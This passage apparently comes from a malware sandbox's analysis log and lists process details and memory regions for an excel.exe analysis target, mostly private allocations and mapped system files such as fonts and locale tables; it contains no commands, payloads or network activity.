# Flog Txt Version 1
# Analyzer Version: 2024.2.1
# Analyzer Build Date: Mar 23 2024 12:02:19
# Log Creation Date: 03.06.2024 09:26:25.634
Process:
id = "1"
image_name = "excel.exe"
filename = "c:\\program files\\microsoft office\\office16\\excel.exe"
page_root = "0x48f10000"
os_pid = "0xe44"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "analysis_target"
parent_id = "0"
os_parent_pid = "0x778"
cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE\""
cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 252
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 253
start_va = 0x20000
end_va = 0x21fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 254
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 255
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 256
start_va = 0x50000
end_va = 0x50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 257
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 258
start_va = 0x70000
end_va = 0x16ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 259
start_va = 0x170000
end_va = 0x1d6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 260
start_va = 0x1e0000
end_va = 0x2dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 261
start_va = 0x2e0000
end_va = 0x2e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002e0000"
filename = ""
Region:
id = 262
start_va = 0x2f0000
end_va = 0x2f0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002f0000"
filename = ""
Region:
id = 263
start_va = 0x300000
end_va = 0x301fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000300000"
filename = ""
Region:
id = 264
start_va = 0x310000
end_va = 0x31ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000310000"
filename = ""
Region:
id = 265
start_va = 0x320000
end_va = 0x321fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000320000"
filename = ""
Region:
id = 266
start_va = 0x330000
end_va = 0x33ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000330000"
filename = ""
Region:
id = 267
start_va = 0x340000
end_va = 0x341fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000340000"
filename = ""
Region:
id = 268
start_va = 0x350000
end_va = 0x44ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 269
start_va = 0x450000
end_va = 0x5d7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000450000"
filename = ""
Region:
id = 270
start_va = 0x5e0000
end_va = 0x760fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005e0000"
filename = ""
Region:
id = 271
start_va = 0x770000
end_va = 0x1b6ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000770000"
filename = ""
Region:
id = 272
start_va = 0x1b70000
end_va = 0x1b71fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001b70000"
filename = ""
Region:
id = 273
start_va = 0x1b80000
end_va = 0x1b81fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001b80000"
filename = ""
Region:
id = 274
start_va = 0x1b90000
end_va = 0x1b91fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001b90000"
filename = ""
Region:
id = 275
start_va = 0x1ba0000
end_va = 0x1ba1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ba0000"
filename = ""
Region:
id = 276
start_va = 0x1bb0000
end_va = 0x1bb0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bb0000"
filename = ""
Region:
id = 277
start_va = 0x1bc0000
end_va = 0x1bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bc0000"
filename = ""
Region:
id = 278
start_va = 0x1c00000
end_va = 0x1c00fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c00000"
filename = ""
Region:
id = 279
start_va = 0x1c10000
end_va = 0x1c14fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c10000"
filename = ""
Region:
id = 280
start_va = 0x1c20000
end_va = 0x1c20fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c20000"
filename = ""
Region:
id = 281
start_va = 0x1c30000
end_va = 0x1c30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001c30000"
filename = ""
Region:
id = 282
start_va = 0x1c40000
end_va = 0x1c40fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c40000"
filename = ""
Region:
id = 283
start_va = 0x1c50000
end_va = 0x1c5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c50000"
filename = ""
Region:
id = 284
start_va = 0x1c60000
end_va = 0x1c6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c60000"
filename = ""
Region:
id = 285
start_va = 0x1c70000
end_va = 0x1c70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c70000"
filename = ""
Region:
id = 286
start_va = 0x1c80000
end_va = 0x1c80fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c80000"
filename = ""
Region:
id = 287
start_va = 0x1c90000
end_va = 0x1c94fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui")
Region:
id = 288
start_va = 0x1ca0000
end_va = 0x1ca0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ca0000"
filename = ""
Region:
id = 289
start_va = 0x1cb0000
end_va = 0x1cb0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001cb0000"
filename = ""
Region:
id = 290
start_va = 0x1cc0000
end_va = 0x1cc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001cc0000"
filename = ""
Region:
id = 291
start_va = 0x1cd0000
end_va = 0x1cd1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001cd0000"
filename = ""
Region:
id = 292
start_va = 0x1ce0000
end_va = 0x1cecfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui")
Region:
id = 293
start_va = 0x1cf0000
end_va = 0x1cf0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001cf0000"
filename = ""
Region:
id = 294
start_va = 0x1d00000
end_va = 0x1d01fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d00000"
filename = ""
Region:
id = 295
start_va = 0x1d10000
end_va = 0x1d8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d10000"
filename = ""
Region:
id = 296
start_va = 0x1d90000
end_va = 0x1e6efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001d90000"
filename = ""
Region:
id = 297
start_va = 0x1e70000
end_va = 0x1ec0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeuil.ttf"
filename = "\\Windows\\Fonts\\segoeuil.ttf" (normalized: "c:\\windows\\fonts\\segoeuil.ttf")
Region:
id = 298
start_va = 0x1ed0000
end_va = 0x1ed1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ed0000"
filename = ""
Region:
id = 299
start_va = 0x1ee0000
end_va = 0x1eecfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "comdlg32.dll.mui"
filename = "\\Windows\\System32\\en-US\\comdlg32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\comdlg32.dll.mui")
Region:
id = 300
start_va = 0x1ef0000
end_va = 0x1f17fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db")
Region:
id = 301
start_va = 0x1f20000
end_va = 0x1f20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f20000"
filename = ""
Region:
id = 302
start_va = 0x1f30000
end_va = 0x202ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f30000"
filename = ""
Region:
id = 303
start_va = 0x2030000
end_va = 0x2031fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002030000"
filename = ""
Region:
id = 304
start_va = 0x2040000
end_va = 0x2050fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1255.nls"
filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls")
Region:
id = 305
start_va = 0x2060000
end_va = 0x2060fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002060000"
filename = ""
Region:
id = 306
start_va = 0x2070000
end_va = 0x216ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002070000"
filename = ""
Region:
id = 307
start_va = 0x2170000
end_va = 0x21eefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeui.ttf"
filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf")
Region:
id = 308
start_va = 0x21f0000
end_va = 0x22effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 309
start_va = 0x22f0000
end_va = 0x25befff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 310
start_va = 0x25c0000
end_va = 0x3601fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "xlintl32.dll"
filename = "\\Program Files\\Microsoft Office\\Office16\\1033\\XLINTL32.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\1033\\xlintl32.dll")
Region:
id = 311
start_va = 0x3610000
end_va = 0x370ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003610000"
filename = ""
Region:
id = 312
start_va = 0x3710000
end_va = 0x380ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003710000"
filename = ""
Region:
id = 313
start_va = 0x3810000
end_va = 0x3810fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003810000"
filename = ""
Region:
id = 314
start_va = 0x3820000
end_va = 0x3821fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003820000"
filename = ""
Region:
id = 315
start_va = 0x3830000
end_va = 0x3831fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003830000"
filename = ""
Region:
id = 316
start_va = 0x3840000
end_va = 0x3841fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003840000"
filename = ""
Region:
id = 317
start_va = 0x3850000
end_va = 0x38abfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "shell32.dll.mui"
filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui")
Region:
id = 318
start_va = 0x38b0000
end_va = 0x38b1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000038b0000"
filename = ""
Region:
id = 319
start_va = 0x38c0000
end_va = 0x38c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "explorerframe.dll.mui"
filename = "\\Windows\\System32\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\explorerframe.dll.mui")
Region:
id = 320
start_va = 0x38d0000
end_va = 0x38dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000038d0000"
filename = ""
Region:
id = 321
start_va = 0x38e0000
end_va = 0x39dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000038e0000"
filename = ""
Region:
id = 322
start_va = 0x39e0000
end_va = 0x3adffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000039e0000"
filename = ""
Region:
id = 323
start_va = 0x3ae0000
end_va = 0x3af1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003ae0000"
filename = ""
Region:
id = 324
start_va = 0x3b00000
end_va = 0x3b11fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b00000"
filename = ""
Region:
id = 325
start_va = 0x3b20000
end_va = 0x3b23fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 326
start_va = 0x3b30000
end_va = 0x3b32fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b30000"
filename = ""
Region:
id = 327
start_va = 0x3b40000
end_va = 0x3b42fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b40000"
filename = ""
Region:
id = 328
start_va = 0x3b50000
end_va = 0x3b52fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b50000"
filename = ""
Region:
id = 329
start_va = 0x3b60000
end_va = 0x3b60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b60000"
filename = ""
Region:
id = 330
start_va = 0x3b70000
end_va = 0x3b70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b70000"
filename = ""
Region:
id = 331
start_va = 0x3b80000
end_va = 0x3b80fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b80000"
filename = ""
Region:
id = 332
start_va = 0x3b90000
end_va = 0x3b92fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003b90000"
filename = ""
Region:
id = 333
start_va = 0x3ba0000
end_va = 0x3c9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003ba0000"
filename = ""
Region:
id = 334
start_va = 0x3ca0000
end_va = 0x409ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003ca0000"
filename = ""
Region:
id = 335
start_va = 0x40a0000
end_va = 0x419ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000040a0000"
filename = ""
Region:
id = 336
start_va = 0x41a0000
end_va = 0x41a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000041a0000"
filename = ""
Region:
id = 337
start_va = 0x41b0000
end_va = 0x41bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000041b0000"
filename = ""
Region:
id = 338
start_va = 0x41c0000
end_va = 0x41c0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000041c0000"
filename = ""
Region:
id = 339
start_va = 0x41d0000
end_va = 0x41d1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000041d0000"
filename = ""
Region:
id = 340
start_va = 0x41e0000
end_va = 0x41e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000041e0000"
filename = ""
Region:
id = 341
start_va = 0x41f0000
end_va = 0x426ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000041f0000"
filename = ""
Region:
id = 342
start_va = 0x4270000
end_va = 0x4a6ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004270000"
filename = ""
Region:
id = 343
start_va = 0x4a70000
end_va = 0x4ad3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "seguisb.ttf"
filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf")
Region:
id = 344
start_va = 0x4ae0000
end_va = 0x4ae0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ae0000"
filename = ""
Region:
id = 345
start_va = 0x4af0000
end_va = 0x4af0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004af0000"
filename = ""
Region:
id = 346
start_va = 0x4b00000
end_va = 0x4b00fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b00000"
filename = ""
Region:
id = 347
start_va = 0x4b10000
end_va = 0x4b10fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b10000"
filename = ""
Region:
id = 348
start_va = 0x4b20000
end_va = 0x4b9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b20000"
filename = ""
Region:
id = 349
start_va = 0x4ba0000
end_va = 0x4ba0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ba0000"
filename = ""
Region:
id = 350
start_va = 0x4bb0000
end_va = 0x4bb0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bb0000"
filename = ""
Region:
id = 351
start_va = 0x4bc0000
end_va = 0x4bc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bc0000"
filename = ""
Region:
id = 352
start_va = 0x4bd0000
end_va = 0x4bd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bd0000"
filename = ""
Region:
id = 353
start_va = 0x4be0000
end_va = 0x4c27fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004be0000"
filename = ""
Region:
id = 354
start_va = 0x4c30000
end_va = 0x4c30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c30000"
filename = ""
Region:
id = 355
start_va = 0x4c40000
end_va = 0x4c4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c40000"
filename = ""
Region:
id = 356
start_va = 0x4c50000
end_va = 0x4c97fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c50000"
filename = ""
Region:
id = 357
start_va = 0x4ca0000
end_va = 0x4ca0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ca0000"
filename = ""
Region:
id = 358
start_va = 0x4cb0000
end_va = 0x4cb0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cb0000"
filename = ""
Region:
id = 359
start_va = 0x4cc0000
end_va = 0x4cc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cc0000"
filename = ""
Region:
id = 360
start_va = 0x4cd0000
end_va = 0x4dcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cd0000"
filename = ""
Region:
id = 361
start_va = 0x4dd0000
end_va = 0x4e7afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tahoma.ttf"
filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf")
Region:
id = 362
start_va = 0x4e80000
end_va = 0x4e80fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e80000"
filename = ""
Region:
id = 363
start_va = 0x4e90000
end_va = 0x4e90fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e90000"
filename = ""
Region:
id = 364
start_va = 0x4ea0000
end_va = 0x4ea0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ea0000"
filename = ""
Region:
id = 365
start_va = 0x4eb0000
end_va = 0x4faffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004eb0000"
filename = ""
Region:
id = 366
start_va = 0x4fb0000
end_va = 0x51affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004fb0000"
filename = ""
Region:
id = 367
start_va = 0x51b0000
end_va = 0x52affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000051b0000"
filename = ""
Region:
id = 368
start_va = 0x52b0000
end_va = 0x52dffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db")
Region:
id = 369
start_va = 0x52e0000
end_va = 0x52e3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 370
start_va = 0x52f0000
end_va = 0x52fdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 371
start_va = 0x5300000
end_va = 0x5301fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005300000"
filename = ""
Region:
id = 372
start_va = 0x5310000
end_va = 0x5310fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005310000"
filename = ""
Region:
id = 373
start_va = 0x5320000
end_va = 0x5320fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005320000"
filename = ""
Region:
id = 374
start_va = 0x5330000
end_va = 0x5331fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005330000"
filename = ""
Region:
id = 375
start_va = 0x5340000
end_va = 0x5340fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005340000"
filename = ""
Region:
id = 376
start_va = 0x5350000
end_va = 0x544ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005350000"
filename = ""
Region:
id = 377
start_va = 0x5450000
end_va = 0x5d7ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 378
start_va = 0x5d80000
end_va = 0x5de5fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")
Region:
id = 379
start_va = 0x5df0000
end_va = 0x5df0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005df0000"
filename = ""
Region:
id = 380
start_va = 0x5e00000
end_va = 0x5efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005e00000"
filename = ""
Region:
id = 381
start_va = 0x5f00000
end_va = 0x5f03fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 382
start_va = 0x5f10000
end_va = 0x5f10fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db")
Region:
id = 383
start_va = 0x5f20000
end_va = 0x5f23fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 384
start_va = 0x5f30000
end_va = 0x5f30fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{82cb5ea4-a17b-4126-a4c7-e62dcc8f64aa}.2.ver0x0000000000000003.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{82CB5EA4-A17B-4126-A4C7-E62DCC8F64AA}.2.ver0x0000000000000003.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{82cb5ea4-a17b-4126-a4c7-e62dcc8f64aa}.2.ver0x0000000000000003.db")
Region:
id = 385
start_va = 0x5f40000
end_va = 0x5f40fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005f40000"
filename = ""
Region:
id = 386
start_va = 0x5f50000
end_va = 0x5f50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005f50000"
filename = ""
Region:
id = 387
start_va = 0x5f60000
end_va = 0x605ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005f60000"
filename = ""
Region:
id = 388
start_va = 0x6060000
end_va = 0x6060fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006060000"
filename = ""
Region:
id = 389
start_va = 0x6070000
end_va = 0x6077fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006070000"
filename = ""
Region:
id = 390
start_va = 0x6080000
end_va = 0x6080fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 391
start_va = 0x6090000
end_va = 0x6091fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006090000"
filename = ""
Region:
id = 392
start_va = 0x60a0000
end_va = 0x649ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000060a0000"
filename = ""
Region:
id = 393
start_va = 0x64a0000
end_va = 0x6c9ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000064a0000"
filename = ""
Region:
id = 394
start_va = 0x6ca0000
end_va = 0x6d9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006ca0000"
filename = ""
Region:
id = 395
start_va = 0x6da0000
end_va = 0x6e9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006da0000"
filename = ""
Region:
id = 396
start_va = 0x6ea0000
end_va = 0x6ea0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006ea0000"
filename = ""
Region:
id = 397
start_va = 0x6ed0000
end_va = 0x6edffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006ed0000"
filename = ""
Region:
id = 398
start_va = 0x6ee0000
end_va = 0x76dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006ee0000"
filename = ""
Region:
id = 399
start_va = 0x76e0000
end_va = 0x7ae0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000076e0000"
filename = ""
Region:
id = 400
start_va = 0x7af0000
end_va = 0x7ef0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007af0000"
filename = ""
Region:
id = 401
start_va = 0x7f00000
end_va = 0x8300fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007f00000"
filename = ""
Region:
id = 402
start_va = 0x8310000
end_va = 0x850ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008310000"
filename = ""
Region:
id = 403
start_va = 0x8510000
end_va = 0x89cffff
monitored = 1
entry_point = 0x0
region_type = private
